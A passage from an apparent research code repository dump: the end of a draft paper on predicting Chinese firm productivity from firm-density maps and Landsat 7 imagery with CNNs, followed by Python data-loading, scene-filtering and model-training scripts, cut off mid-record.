comprehensive census of firms conducted by the National Bureau of Statistics of China (NBS). This covers firms in all industries and localities, and we have waves from both 2004 and 2008 available. Past studies have largely relied on manufacturing firms This additional data allows us to look more closely at clustering within services, as well as potential spillovers between services and manufacturing. Further, by looking at the case of China, we get a snapshot of a country (especially in the early 2000s) in a period of rapid transition, but one that has already industrialized to a considerable degree. Additionally, this is an environment shaped by far more aggressive industrial policies than those seen in much of Western Europe and North America.\n\nIn terms of techniques, we take a machine learning approach to understanding firm clustering and agglomeration. Specifically, we use images generated by density maps of firm location data (from the NBS data) as well as linked satellite imagery from the Landsat 7 spacecraft. This allows us to frame the issue as one of prediction. By predicting firm outcomes such as profitability, productivity, and growth using these images, we can understand their relationship to firm clustering. By turning this into a prediction problem using images as inputs, we can tap into the rich and rapidly evolving literature in computer science and machine learning on deep convolutional neural networks (CNN). Additionally, we can utilize software and hardware tools developed for this purpose.\n\n# Data Overview\n\nOur firm data comes from the periodic survey of firms conducted by the Chinese NBS. In our case, we have waves from both 2004 and 2008. The 2004 wave constitutes roughly 1.5M firms, while the 2008 wave has considerably more with about 7.1M firms. 
For each firm we see a variety of aggregated statistics such as income and number of employees, the four digit industry in which they operate, their ownership structure (private or state-owned), amongst many others.\n\nWe also are given the address of the headquarters ^[In most cases this is a specific street address, but in some cases in is only the township, which is nonetheless rather specific.]. In the vast majority of cases where firms have a single establishment or plant, this address is the firms only operating location. Using this information, we are able to obtain the longitude and latitude for each firm to within about 100 meters. One issue is that these are given in the BD-09 coordinate system, which is based on the GCJ-02 coordinate system, both of which are designed to intentionally obfuscate the exact location of given coordinates by applying a pseudo-random mapping to the true location ^[See [here](https://en.wikipedia.org/wiki/Restrictions_on_geographic_data_in_China) for more details]. Fortunately, there are existing fixed-point algorithms that can reliably invert these mappings with minimal impact on the resulting location accuracy.\n\n@! [bd_wgs_compare] Accuracy of uncorrected BD-09 versus corrected WGS-84 coordinates using a highly recognizable structure, the central pavilion of the Forbidden City in Beijing (distances in meters).\n\n\nAs can be seen in @[bd_wgs_compare], the accuracy loss from using uncorrected coordinates is on the order of 500 meters. This can be a substantial error when attempting to understand the importance of clustering in extremely dense areas such as that pictured above (central Beijing).\n\nIn addition to firm level data from the NBS, we also have linked patent data from the Chinese State Intellectual Property Office (SIPO). This data can be thought of as roughly comparable to patent data in the US context, although we do not currently have information on patent citations, making it impossible to compute citation weighted metrics. Thus we rely purely on patent counts and information on the technology class (IPC) that are filed under. We do not currently use the abstract text for this project ^[See Hanley and Luo (2018) for such an example in the clean technology space.].\n\nFinally, we employ satellite imagery to bring in additional information about the nature and structure of the environment in which the firms are operating. The most widely available public satellite data for this time period is that from Landsat 7, which is operated by the US Geographical Survey (USGS). Launched in 1999 and still operating today, it provides global coverage at 15 meter resolution in a variety of visible and non-visible frequencies. Unfortunately, an partial instrument failure in 2003 caused imagery produced thereafter to suffer from substantially lower quality. Thus, we only use data from 2003 or earlier and focus on the 2004 wave of firms data. @[landsat_demo] displays satellite imagery at various radii for a firm located in Shanghai.\n\n@! [landsat_demo] Landsat 7 imagery centered on Shanghai Happy Vacuum Cleaner Factory. Dark patches are areas of cloud cover.\n\n\nThe Landsat 7 imagery is generally fairly high quality. The major challenge is obtaining uniformly cloud-free coverage. Major providers like Google generally stitch together many sources for land locations (though less so for water locations). In our setting, we attempt to choose images with less than 20% cloud coverage within a range of a few months. 
However, since images are provided in cells of 100 kilometers on a side, it is not feasible to push this threshhold any lower without losing uniform land coverage.\n\n# Techniques\n\nThere are a wide variety of ways that cities and firms can be laid out. This including gridding patterns, geographic features like rivers, technology parks, and industrial zones. Some of this is partly determined by nature or decisions made long ago, while certain features are a product of contemporaneous decisions by governments or firms. Pictured in @[density_overlay] are maps of firm density in two cities of note: Shanghai and Xi'an.\n\n@! [density_overlay] Firm density at 15 meter cell resolution overlaid on satellite imagery of Shanghai (left) and Xi'an (right). Note the different distance scales.\n\n\nShanghai is, of course, notably larger in terms of population and area, though it is also quite a bit more dense with firms. The former is also distinguished by its division in two by the Huangpu River, though Xi'an itself is heavily influenced by its ancient city wall that surround core of roughly 1.5 by 2 kilometers. Another notable feature seen in the southwest quadrant of the firm density overlay is the Xi'an Hi-tech Industrial Development Zone.\n\nVarious methods have been developed to measure and quantify firm *clustering* (how they are arranged geographically, particularly at high density) and *agglomeration* (their tendency to group together by industry). Studies on the relationship between geographic concentration and firm growth require an accurate measure of firm location patterns. @[ellison1997geographic] using discrete spatial units like states to measure the location patterns of industries across regions. Discrete spatial units that capture relevant regional markets offer a reasonable starting point for understanding location patterns. @[maurel1999measure] and @[devereux2004geographic] develop alternative indices of localization taking similar approach. However, indices like @[ellison1997geographic] are always sensitive to the choice of regional boundaries, e.g., counties, cities or states. Outcomes may vary to a large degree when changing from one aggregation level to another. Furthermore, spatial divisions normally do not depend on economic characteristics but on administrative classifications.\n\n@[duranton2005testing] instead proposes analyzing spatial clustering using distance-based methods that do not discretize an area into spatial subunits but see it as a continuous space. Distance-based methods have a more longstanding tradition in disciplines such as forestry or astronomy but have rarely been used for spatial economics. This is mainly due to standard distance-based methods compare a point pattern with a theoretical topographic concentration, generally using a spatial Poisson process. However, in economics, this comparison is not meaningful since firms cannot settle anywhere. Locations of firms are highly restricted due to planning regularities, accessibility, and properties of the surface (mountains, lakes, swamps, etc.). To overcome the shortcomings of topographic measures, @[duranton2005testing] measure the spatial concentration of industry relative to the overall localization of firms in the area under investigation. A growing literature has applied this measure in understanding motivation for agglomeration (@[ellison2010causes], @[ellison2010causes]; @[alfaro2014global], @[alfaro2014global]). 
However, the use of the usage of this distance-based methods is not only limited by its high demand for spatially fine-grained data and computation but also not being able to measure the relative localization of individual firms.\n\nNonetheless, such aggregated measures discard much of the micro-structure of the rich, high-dimensional data we are drawing from. To address this, we propose taking advantage of recent advanced in deep learning motivated primarily by computer vision applications. The inputs are similar, namely two-dimensional maps and images, and the goal remains prediction. In the case, we don't wish to predict, say the identity or class of the object being depicted, but rather some outcome of the firm at the center of a particular map, such as productivity, profitability, patenting rate, or revenue growth.\n\nOne of the major challenges with such an approach is that much the information present the maps above, for instance the distance to the city core, are in fact proxies for other existing features such as industry. Thus the task is not to predict unconditional features, but to predict residuals left over after controlling for known factors. An alternative to this approach would also be to incorporate such features into a unified analysis and let the optimization algorithm sort out the proper weights.\n\n# Implementation\n\nOur chosen approach is to utilize a deep convolutional neural network (CNN) to predict residual firm profitability and firm growth after having partialed out such standard controls industry and firm age. CNNs have proven extremely effective at the task of image classification. Widely available databases of hand-labeled images have spurred heavy competition, and approaches such as those seen with AlexNet or Inception-v3 have yielded impressive results. Meanwhile, the development of less expensive, high powered GPUs has greatly expanded the scope of solvable problems. On top of this, the development of easier-to-use libraries such as Tensorflow (Google) and Torch (Facebook) has made such undertakings both easier and open to a wider class of researchers and practictioners.\n\nFor comparison, ImageNet has over 14M images in its database, while our dataset has 1.4M firms in 2004 and roughly 7.1M firms in 2008. Thus it is reasonable to think we could utilize models of similar or slightly smaller complexity. The application is of course slightly different in terms of the nature of the images at hand, so this is somewhat speculative at this stage. Recent approaches have included a technique known as transfer learning, wherein large, general classifiers are pretrained at industrial scale (generally by large technology companies such as Google), and are then tweaked on specific datasets for more specialized usages. 
This approach, while certainly useful, would be less applicable in this case, as the image domain is quite different from that of generic image classification.\n\n# Results\n\nTBD\n\n# References\n\n@@ [duranton2005testing]\ntitle: Testing for localization using micro-geographic data\nauthors: Gilles Duranton; Henry Overman\njournal: The Review of Economic Studies\nyear: 2005\ndoi: 10.1111/0034-6527.00362\n\n@@ [ellison1997geographic]\ntitle: Geographic concentration in US manufacturing industries: a dartboard approach\nauthors: Glenn Ellison; Edward Glaeser\njournal: Journal of Political Economy\nyear: 1997\ndoi: 10.1086/262098\n\n@@ [maurel1999measure]\ntitle: A measure of the geographic concentration in French manufacturing industries\nauthors: Françoise Maurel; Béatrice Sédillot\njournal: Regional Science and Urban Economics\nyear: 1999\ndoi: 10.1016/S0166-0462(99)00020-4\n\n@@ [devereux2004geographic]\ntitle: The geographic distribution of production activity in the UK\nauthors: Michael Devereux; Rachel Griffith; Helen Simpson\njournal: Regional Science and Urban Economics\nyear: 2004\ndoi: 10.1016/S0166-0462(03)00073-5\n\n@@ [alfaro2014global]\ntitle: The global agglomeration of multinational firms\nauthors: Laura Alfaro; Maggie Xiaoyang Chen\njournal: Journal of International Economics\nyear: 2014\ndoi: 10.1016/j.jinteco.2014.09.001\n\n@@ [ellison2010causes]\ntitle: What causes industry agglomeration? Evidence from coagglomeration patterns\nauthors: Glenn Ellison; Edward Glaeser; William Kerr\njournal: American Economic Review\nyear: 2010\ndoi: 10.1257/aer.100.3.1195"
},
{
"alpha_fraction": 0.6370967626571655,
"alphanum_fraction": 0.6651103496551514,
"avg_line_length": 37,
"blob_id": "88eea74ae3b856966343086b0bd2f4f12932ee9e",
"content_id": "b252b5ceb214e9743b865b07b8233e2fe809b4bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2356,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 62,
"path": "/code/train_run.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport sklearn.model_selection as sk\n\nimport train_data as data\nimport train_tools as tools\nimport train_models as models\n\nfrom mectools.plotter import plotter\nplt = plotter(backend='agg')\n\nfor gpu in tf.config.experimental.list_physical_devices('GPU'):\n tf.config.experimental.set_memory_growth(gpu, True)\n\n# path = 'data/tiles_fast/asie2003'\n# source = 'asie'\n# year = 2003\ndef load_dataset(path, source, year, channels=['density'], val_frac=0.2, batch_size=128, buf_size=10_000, landsat='mincloud2002', ivar='id', yvar='log_tfp', split='rand'):\n if source == 'asie':\n firms = data.load_asie_firms(year, landsat)\n elif source == 'census':\n firms = data.load_census_firms(year, landsat)\n\n # random geographic split\n if split == 'geo':\n state = np.random.RandomState(21921351)\n df_train, df_valid = tools.categ_split(firms, 'city', val_frac, state=state)\n print(len(df_valid)/(len(firms)))\n else:\n df_train, df_valid = sk.train_test_split(firms, test_size=val_frac)\n\n def parse_function(fid, out):\n image = tf.concat([data.load_tile(fid, f'{path}/{ch}') for ch in channels], -1)\n return (fid, image), out\n\n def make_dataset(df):\n fids = tf.constant(df[ivar])\n labels = tf.reshape(tf.cast(tf.constant(df[yvar]), tf.float32), (-1, 1))\n data = tf.data.Dataset.from_tensor_slices((fids, labels))\n data = data.map(parse_function)\n data = data.shuffle(buffer_size=buf_size)\n data = data.batch(batch_size)\n data = data.repeat()\n return data\n\n return make_dataset(df_train), make_dataset(df_valid)\n\ndef train_model(train, valid, pix=256, nchan=1, epochs=5, steps_per_epoch=2000, validation_steps=100):\n model = models.gen_dual_medium(pix, nchan)\n history = model.fit(train, validation_data=valid, epochs=epochs, steps_per_epoch=steps_per_epoch, validation_steps=validation_steps)\n return model, history\n\ndef plot_variation(model, dataset, save=None):\n x_test, y_test, yh_test = tools.predict_data(model, dataset, 100)\n fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(11, 5))\n tools.eval_model(y_test, yh_test, N=10, axs=(ax0, ax1), qmin=0.02, qmax=0.98)\n if save is not None:\n fig.savefig(save)\n return fig\n"
},
{
"alpha_fraction": 0.5650208592414856,
"alphanum_fraction": 0.5792768001556396,
"avg_line_length": 31.314607620239258,
"blob_id": "345e38c78dbb27f48173a0fbe85cb50355eb8f4d",
"content_id": "f3aa372442536bcc53961fc9bd2c603fdb21bfe3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2876,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 89,
"path": "/code/torch_tools.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "from os import path\nfrom glob import glob\nfrom PIL import Image\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom torchvision.models import resnet\n\ndef pil_loader(path):\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert()\n\ndef gen_path(i):\n tag = f'{i:07d}'\n sub = tag[:4]\n return f'{sub}/{tag}'\n\nclass ImageDataset(data.Dataset):\n def __init__(self, sources, metadata, transform=None, ext='jpg'):\n self.ids = metadata.index.tolist()\n self.data = torch.tensor(metadata.to_numpy(), dtype=torch.float)\n\n self.sources = sources\n self.paths = [f'{gen_path(i)}.{ext}' for i in self.ids]\n\n self.transform = transform\n\n def __getitem__(self, idx):\n path, data = self.paths[idx], self.data[idx]\n imgs = torch.cat([\n self.transform(pil_loader(f'{src}/{path}')) for src in self.sources\n ])\n return imgs, data\n \n def __len__(self):\n return len(self.ids)\n\ndef make_resnet(nchan=1, nclass=1):\n model = resnet.ResNet(resnet.BasicBlock, [2, 2, 2, 2], num_classes=nclass)\n model.conv1 = nn.Conv2d(nchan, 64, kernel_size=7, stride=2, padding=3, bias=False)\n return model\n\ndef loss_function(y, yh, scale=100):\n return scale*F.mse_loss(yh, y)\n\ndef train(model, loader, optim, epoch):\n log_interval = len(loader.dataset) // loader.batch_size // 5\n model.train()\n train_loss = 0\n for batch_idx, data in enumerate(loader):\n img, stat = data[0].to('cuda'), data[1].to('cuda')\n optim.zero_grad()\n pred = model(img).squeeze(1)\n loss = loss_function(pred, stat)\n loss.backward()\n train_loss += loss.item()\n optim.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{:06d}/{} ({:2.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(stat), len(loader.dataset),\n 100. * batch_idx / len(loader),\n loss.item() / len(stat)))\n\ndef test(model, loader, epoch):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for batch_idx, data in enumerate(loader):\n img, stat = data[0].to('cuda'), data[1].to('cuda')\n pred = model(img).squeeze(1)\n test_loss += loss_function(pred, stat).item()\n avg_loss = test_loss / len(loader.dataset)\n print(f'====> Test set loss: {avg_loss:.4f}')\n\ndef evaluate(model, loader):\n model.eval()\n with torch.no_grad():\n stat_list = []\n pred_list = []\n for batch_idx, data in enumerate(loader):\n img, stat = data[0].to('cuda'), data[1].to('cuda')\n pred = model(img).squeeze(1)\n stat_list.append(stat)\n pred_list.append(pred)\n stat_list = torch.cat(stat_list)\n pred_list = torch.cat(pred_list)\n return stat_list, pred_list\n"
},
{
"alpha_fraction": 0.6068548560142517,
"alphanum_fraction": 0.6198156476020813,
"avg_line_length": 34.42856979370117,
"blob_id": "fc8ae54fcdbeee7cbe00a0fff4faff07b67a6bfa",
"content_id": "ec624a4b2d3db1e79170efa9685cd3b08b700fee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3472,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 98,
"path": "/code/train_data.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport statsmodels.formula.api as smf\nimport tensorflow as tf\n\nimport mectools.data as dt\n\nimport train_schema as schema\n\n##\n## firm loading\n##\n\ndef load_asie_firms(year, landsat, drop=True):\n # load in firm and location data\n cols = schema.asie[year]\n firms = pd.read_csv(f'../data/firms/asie{year}_geocode.csv', usecols=cols).rename(cols, axis=1)\n targ = pd.read_csv(f'../index/firms/asie{year}_{landsat}.csv', usecols=['id', 'lat_wgs84', 'lon_wgs84', 'prod_id'])\n firms = pd.merge(firms, targ, on='id', how='left').dropna(subset=['id', 'sic4', 'prod_id', 'prefecture'])\n\n # regulate id\n firms['id'] = firms['id'].astype(np.int)\n firms['sic4'] = firms['sic4'].astype(np.int)\n firms = firms.drop_duplicates(subset='id').set_index('id', drop=False)\n \n # geographic location\n firms['prefecture'] = pd.to_numeric(firms['prefecture'], errors='coerce').astype(np.int)\n firms['city'] = firms['prefecture'].apply(lambda x: int(str(x)[:3]))\n\n # industry classify\n firms['sic3'] = firms['sic4'] // 10\n firms['sic2'] = firms['sic4'] // 100\n\n # calculate outcome stats\n firms['prod'] = firms['value_added']/firms['employees']\n\n # logify\n for c in ['value_added', 'assets_fixed', 'wages', 'prod']:\n firms[f'log_{c}'] = dt.log(firms[c])\n\n # filter out bad ones\n if drop:\n firms = firms.dropna(subset=['log_value_added', 'log_assets_fixed', 'log_wages'])\n\n # compute tfp as residual\n firms['log_tfp'] = smf.ols('log_value_added ~ log_assets_fixed + log_wages', data=firms).fit().resid\n firms['log_tfp_resid'] = smf.ols('log_tfp ~ C(sic2) + C(city)', data=firms).fit().resid\n firms['log_prod_resid'] = smf.ols('log_prod ~ C(sic2) + C(city)', data=firms).fit().resid\n\n return firms\n\ndef load_census_firms(year, landsat):\n # load in firm and location data\n cols = schema.census[year]\n firms = pd.read_csv(f'../data/firms/census{year}_geocode.csv', usecols=cols).rename(cols, axis=1)\n targ = pd.read_csv(f'../index/firms/census{year}_{landsat}.csv', usecols=['id', 'lat_wgs84', 'lon_wgs84', 'prod_id'])\n firms = pd.merge(firms, targ, on='id', how='left').dropna(subset=['id', 'sic4', 'prod_id', 'location_code'])\n\n # regulate id\n firms['id'] = firms['id'].astype(np.int)\n firms['sic4'] = firms['sic4'].astype(np.int)\n firms = firms.drop_duplicates(subset='id').set_index('id', drop=False)\n\n # geographic location\n firms['prefecture'] = firms['location_code'].astype(np.int).apply(lambda x: int(str(x)[:4]))\n firms['city'] = firms['prefecture'].apply(lambda x: int(str(x)[:3]))\n\n # industry classify\n firms['sic3'] = firms['sic4'] // 10\n firms['sic2'] = firms['sic4'] // 100\n\n # calculate outcome stats\n firms['prod'] = firms['income']/firms['employees']\n\n # logify\n for c in ['income', 'prod']:\n firms[f'log_{c}'] = dt.log(firms[c])\n\n # filter out bad ones\n firms = firms.dropna(subset=['log_income', 'log_prod'])\n\n # compute tfp as residual\n firms['log_prod_resid'] = smf.ols('log_prod ~ C(sic2)', data=firms).fit().resid\n\n return firms\n\n##\n## image loading\n##\n\ndef load_tile(fid, base, ext='jpg'):\n tag = tf.strings.as_string(fid, width=7, fill='0')\n sub = tf.strings.substr(tag, 0, 4)\n fn = tf.strings.join([tag, ext], '.')\n fp = tf.strings.join([base, sub, fn], '/')\n dat = tf.io.read_file(fp)\n img = tf.image.decode_jpeg(dat, channels=1)\n return img\n"
},
{
"alpha_fraction": 0.6353775262832642,
"alphanum_fraction": 0.664997935295105,
"avg_line_length": 43.38888931274414,
"blob_id": "daac7fe8a87181d517af5b7a008143587ab3ea10",
"content_id": "800c0f48bdecc1a202909217bd747074e98ade66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2397,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 54,
"path": "/code/firm_scenes.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import argparse\nimport numpy as np\nimport pandas as pd\nfrom coord_transform import bd2wgs, wgs2utm\n\n# python3 firm_scenes.py data/firms/census2004_geocode.csv index/firms/census2004_mincloud2002.csv --index index/scenes/google_scenes_2002_mincloud.csv\n\nparser = argparse.ArgumentParser(description='Index which scene each firm belongs to.')\nparser.add_argument('firms', type=str, help='path to firm location data')\nparser.add_argument('output', type=str, help='path to output file')\nparser.add_argument('--index', type=str, help='scene index to use')\nargs = parser.parse_args()\n\n# load firm data\nfirms = pd.read_csv(args.firms, usecols=['id', 'sic4', 'lon_bd09', 'lat_bd09'])\nfirms = firms[(firms['id'] % 1) == 0]\nfirms['id'] = firms['id'].astype('Int64')\nfirms['sic4'] = firms['sic4'].astype('Int64')\nfirms = firms.dropna()\n\n# load index data\nindex = pd.read_csv(args.index, usecols=['PRODUCT_ID', 'NORTH_LAT', 'SOUTH_LAT', 'EAST_LON', 'WEST_LON']).dropna()\nindex = index.rename(columns={'PRODUCT_ID': 'prod_id'})\n\n# find scene centers\nindex['cent_lon'] = 0.5*(index['WEST_LON']+index['EAST_LON'])\nindex['cent_lat'] = 0.5*(index['NORTH_LAT']+index['SOUTH_LAT'])\n\n# analytic transformations\nfirms[['lon_wgs84', 'lat_wgs84']] = firms[['lon_bd09', 'lat_bd09']].apply(lambda lonlat: list(bd2wgs(*lonlat)), raw=True, result_type='expand', axis=1)\nfirms['utm_zone'] = firms[['lon_wgs84', 'lat_wgs84']].apply(lambda lonlat: wgs2utm(*lonlat), raw=True, axis=1)\n\n# find scenes containing firms\nmatch_firm, match_scene = np.nonzero(\n (index['NORTH_LAT'][None,:] >= firms['lat_wgs84'][:,None])\n & (index['SOUTH_LAT'][None,:] <= firms['lat_wgs84'][:,None])\n & (index['EAST_LON' ][None,:] >= firms['lon_wgs84'][:,None])\n & (index['WEST_LON' ][None,:] <= firms['lon_wgs84'][:,None])\n)\nmatch = pd.DataFrame({\n 'id': firms['id'].iloc[match_firm].values,\n 'prod_id': index['prod_id'].iloc[match_scene].values\n})\n\n# find best match scenes\nmatch = match.merge(firms[['id', 'sic4', 'lon_wgs84', 'lat_wgs84']], on='id')\nmatch = match.merge(index[['prod_id', 'cent_lon', 'cent_lat']], on='prod_id')\nmatch['dist'] = np.sqrt((match['cent_lon']-match['lon_wgs84'])**2+(match['cent_lat']-match['lat_wgs84'])**2)\nbest = match.groupby('id')['dist'].idxmax()\nprods = match[['id', 'prod_id']].loc[best]\nfirms = firms.merge(prods, on='id', how='left')\n\n# save results\nfirms.to_csv(args.output, index=False)\n"
},
{
"alpha_fraction": 0.6872881650924683,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 37.064517974853516,
"blob_id": "a65a03456c0471827d250b62f1b2b8597322ec90",
"content_id": "c06c73c67aed48eb633b5065da802451ba21e03a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 31,
"path": "/code/thumbnails.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n\nimport os\nimport glob\nimport argparse\nfrom PIL import Image\n\nparser = argparse.ArgumentParser(description='Generate list of scenes matching certain criterion.')\nparser.add_argument('--input', type=str, default='scenes', help='directory to intput from')\nparser.add_argument('--output', type=str, default='thumbs', help='directory to output to')\nparser.add_argument('--size', type=int, default=512, help='thumbnail size')\nparser.add_argument('--format', type=str, default='png', help='image format for output')\nparser.add_argument('--overwrite', action='store_true', help='whether to overwrite existing')\nargs = parser.parse_args()\n\nImage.MAX_IMAGE_PIXELS = 1000000000\nsize = (args.size, args.size)\n\nthumb_list = []\nfor fn in glob.glob(f'{args .input}/*.TIF'):\n dpath, fname = os.path.split(fn)\n fbase, _ = os.path.splitext(fname)\n tpath = f'{args.output}/{fbase}.{args.format}'\n if args.overwrite or not os.path.isfile(tpath):\n thumb_list.append((fn, tpath))\n\nfor spath, tpath in sorted(thumb_list, key=lambda x: x[0]):\n print(f'Converting: {spath} -> {tpath}')\n im = Image.open(spath)\n thumb = im.resize(size)\n thumb.save(tpath)\n"
},
{
"alpha_fraction": 0.6595821380615234,
"alphanum_fraction": 0.7071325778961182,
"avg_line_length": 58.0638313293457,
"blob_id": "b64030de6d2be285c76cfb079598d6cf16035294",
"content_id": "e9264ffd5d04822dec81f78cb39ee02c90f58be9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2776,
"license_type": "no_license",
"max_line_length": 244,
"num_lines": 47,
"path": "/code/filter_scenes.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import argparse\nimport pandas as pd\n\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2002.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-01-01\" --date_max=\"2002-12-31\"\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2002_cloud.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-01-01\" --date_max=\"2002-12-31\" --cloud_max=20\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2007_summer.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-03-01\" --date_max=\"2002-08-31\" --cloud_max=20\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2002_mincloud.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-03-01\" --date_max=\"2002-08-31\"\n\nparser = argparse.ArgumentParser(description='Generate list of scenes matching certain criterion.')\nparser.add_argument('--index', type=str, help='path to full index')\nparser.add_argument('--output', type=str, help='path to output to')\nparser.add_argument('--lat_min', type=int, help='minimal WRS path to use')\nparser.add_argument('--lat_max', type=int, help='maximal WRS path to use')\nparser.add_argument('--lon_min', type=int, help='minimal WRS row to use')\nparser.add_argument('--lon_max', type=int, help='maximal WRS row to use')\nparser.add_argument('--date_min', type=str, help='minimal date to use')\nparser.add_argument('--date_max', type=str, help='maximal date to use')\nparser.add_argument('--cloud_max', type=int, default=100, help='maximal allowed cloud cover (out of 100)')\nparser.add_argument('--spacecraft', type=str, default='LANDSAT_7', help='spacecraft to use')\nargs = parser.parse_args()\n\nprint('loading full index')\nindex = pd.read_csv(args.index).dropna(subset=['PRODUCT_ID'])\n\nprint('selecting on spacecraft')\nindex = index.query(f'SPACECRAFT_ID == \"{args.spacecraft}\"')\n\nprint('selecting on location')\nindex = index[\n (index['NORTH_LAT'] >= args.lat_min) &\n (index['SOUTH_LAT'] <= args.lat_max) &\n (index['EAST_LON' ] >= args.lon_min) &\n (index['WEST_LON' ] <= args.lon_max)\n]\n\nprint('selecting on date')\nindex['DATE_ACQUIRED'] = pd.to_datetime(index['DATE_ACQUIRED'])\nindex = index.query(f'DATE_ACQUIRED >= \"{args.date_min}\" and DATE_ACQUIRED <= \"{args.date_max}\"')\n\nprint('selecting on cloud cover')\nindex = index.query(f'CLOUD_COVER >= 0 and CLOUD_COVER <= {args.cloud_max}')\n\nprint('finding most recent match')\nindex = index.loc[index.groupby(['WRS_PATH', 'WRS_ROW'])['CLOUD_COVER'].idxmin()]\n\nprint('saving to file')\nindex.to_csv(args.output, index=False)\n"
},
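The core of the script is the per-(path, row) least-cloud pick; a toy illustration with made-up rows:

```python
# Minimal illustration of the groupby/idxmin selection (all values made up).
import pandas as pd

index = pd.DataFrame({'WRS_PATH': [123, 123, 124], 'WRS_ROW': [32, 32, 33],
                      'CLOUD_COVER': [40, 5, 12], 'PRODUCT_ID': ['A', 'B', 'C']})
best = index.loc[index.groupby(['WRS_PATH', 'WRS_ROW'])['CLOUD_COVER'].idxmin()]
print(best['PRODUCT_ID'].tolist())  # ['B', 'C']: one least-cloudy scene per cell
```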
{
"alpha_fraction": 0.49058693647384644,
"alphanum_fraction": 0.5127353072166443,
"avg_line_length": 19.522727966308594,
"blob_id": "ddda0608f5faefe03d4c0540b869dea828f7e6c9",
"content_id": "3196816076f8238c9a2576e359c807a2ec1d20a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1157,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 44,
"path": "/code/train_schema.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "census = {}\n\ncensus[2004] = {\n 'id': 'id',\n 'sic4': 'sic4',\n 'location_code': 'location_code',\n 'income': 'income',\n 'total_assets': 'assets',\n 'employees': 'employees'\n}\n\nasie = {}\n\nasie[2003] = {\n 'id': 'id',\n 'sic4': 'sic4',\n '省地县码': 'prefecture',\n '工业总产值(不变价)': 'output',\n '工业增加值': 'value_added',\n '从业人数': 'employees',\n '固定资产合计': 'assets_fixed',\n '无形资产': 'assets_intan',\n '资产总计': 'assets_total',\n '本年应付工资总额': 'wages',\n '工业中间投入合计': 'inputs',\n '利润总额': 'profit',\n '利税总额': 'profit_taxes'\n}\n\nasie[2010] = {\n 'id': 'id',\n 'sic4': 'sic4',\n 'B05': 'prefecture',\n '工业总产值当年价格': 'output',\n '工业增加值': 'value_added',\n '年末从业人员合计_总计': 'employees',\n '固定资产合计': 'assets_fixed',\n '无形资产': 'assets_intan',\n '资产总计': 'assets_total',\n '其中主营业务应付工资总额': 'wages',\n '工业中间投入合计': 'inputs',\n '利润总额': 'profit',\n '利税总额': 'profit_taxes'\n}\n"
},
{
"alpha_fraction": 0.6196682453155518,
"alphanum_fraction": 0.6430687308311462,
"avg_line_length": 37.804595947265625,
"blob_id": "70deddbd7626b0e9f17928699c3fa2a4da5b7012",
"content_id": "138e382ee142ebd23293b4453bc9f049f5946640",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3376,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 87,
"path": "/code/firm_density.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
